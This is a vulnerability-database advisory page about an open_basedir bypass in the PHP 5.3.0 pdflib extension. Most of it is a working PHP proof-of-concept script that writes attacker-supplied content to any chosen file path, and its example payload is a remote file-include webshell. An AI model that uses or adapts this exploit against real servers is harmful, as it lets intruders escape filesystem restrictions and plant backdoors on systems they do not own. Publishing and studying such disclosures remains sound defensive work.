Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22755
HistoryNov 08, 2009 - 12:00 a.m.

Php 5.3.0 pdflib extension open_basedir bypass

2009-11-0800:00:00
vulners.com
27
JSON

Description:

Via this bug , attacker can save a file in path that not allowed in
open_basedir .

Reproduce code:

<?php
// Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
if(!extension_loaded('pdf')){
die('pdf extension required .');
}else{
$__PATH = $_GET['p']; /The path that u want save file in .ex:
/etc/file.php/
$__VALUE = $_GET['v']; /The text that u want save in file .ex:
<?php include $_GET[f];?>/
if(!isset($__PATH,$__VALUE)){

die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_sav
e_in_file]');
}
$__IRCRASH = pdf_new();
pdf_open_file($__IRCRASH,$__PATH);
pdf_begin_page($__IRCRASH,612,792);

pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0);
pdf_end_page($__IRCRASH);
pdf_close($__IRCRASH);
pdf_delete($__IRCRASH);
print('<p>IrCrash Security Team .</p>');
print('<p>' . $__PATH . "\n" . 'created .</p>');}
?>

Expected result:

When attacker run this code , a file in a path that attacker input in
`p` in url , whith value that attacker input in `v` in url.

JSON